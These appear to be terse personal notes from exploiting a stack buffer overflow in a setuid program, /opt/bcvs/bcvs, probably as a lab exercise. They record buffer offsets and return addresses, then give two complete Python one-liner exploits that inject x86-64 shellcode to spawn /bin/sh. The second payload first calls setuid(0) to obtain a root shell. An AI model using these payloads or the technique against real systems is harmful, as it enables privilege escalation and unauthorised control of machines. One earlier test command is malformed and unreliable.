log size = 255

buffer overflow at 101 (strcat(log, argv[2])

main return address: 0x17f3
strcat call address: 0x527e

247 to overwrite buffer
43 extra padding
8 saved pointer
8 return address

r ci $(python -c 'print("A"*+"A"*127+"ABCDEFGHIJKLMNOP")')

ra = 0x4242...42

buffer begins at: 0x7663622e?

gives shell but not root
/opt/bcvs/bcvs ci $(python2 -c 'print(b"\x90"*455+b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"B"*40+b"\x50\xed\xff\xff\xff\x7f")')

another buffer overflow
ci $(python2 -c 'print(b"\x90"*128+b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"+"B"*40+b"\xa0\xe8\xff\xff\xff\x7f")')
